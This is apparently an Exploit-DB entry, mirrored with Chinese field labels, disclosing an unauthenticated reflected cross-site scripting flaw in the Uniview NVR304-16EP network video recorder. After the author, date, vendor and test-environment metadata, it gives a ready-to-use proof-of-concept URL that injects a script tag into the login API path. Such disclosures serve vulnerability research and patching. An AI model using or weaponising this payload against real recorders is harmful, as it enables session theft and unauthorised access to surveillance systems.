Network Video Recorder NVR304-16EP – Reflected Cross-Site Scripting (XSS) (Unauthenticated)

  • 作者: Luis Martínez
    日期: 2022-02-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50744/
  • # Exploit Title: Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
    # Author: Luis Martinez
    # Discovery Date: 2022-02-13
    # Vendor Homepage: https://www.uniview.com/Products/NVR/Easy/NVR304-S-P/#~Product%20features
    # Datasheet of NVR304-S-P: https://www.uniview.com/download.do?id=1819568
    # Tested Version: NVR304-16EP
    # Tested on: Windows 10 Pro 21H2 x64 es - Firefox 91.6.0esr
    # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
    # CVE: N/A
    
    # Proof of Concept:
    
    http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('XSS')</script>